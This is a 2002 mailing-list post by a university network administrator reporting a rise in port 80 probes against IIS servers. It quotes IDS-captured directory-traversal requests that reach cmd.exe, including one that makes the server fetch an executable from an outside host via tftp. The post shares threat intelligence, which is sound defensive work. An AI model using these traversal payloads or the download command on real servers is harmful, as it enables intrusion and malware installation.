[unisog] increasing cmd.exe port 80/tcp probes

Mike Iglesias iglesias at draco.acs.uci.edu
Tue Jun 4 17:05:56 GMT 2002


We're seeing much more scanning on port 80 than usual, and when a vulnerable
IIS server is found they try to get it to tftp a file (we have tftp
blocked at the border so it doesn't work).

Here are some of the patterns our IDS picked up:

HEAD /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:/ HTTP/1.0
HEAD /scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:/ HTTP/1.0
GET /scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1

and then this one was used recently to start the tftp...

GET /scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+c:\winnt\system32\tftp.exe+"-i"+Data2k.homeftp.net+get+WINMGNT.EXE+c:\WINMGNT.EXE HTTP/1.1{D}{A}

data2k.homeftp.net is another name for p5084D684.dip.t-dialin.net (ip
address 80.132.214.142).


Mike Iglesias                          Internet:    iglesias at draco.acs.uci.edu
University of California, Irvine       phone:       949-824-6926
Network & Academic Computing Services  FAX:         949-824-2069



More information about the unisog mailing list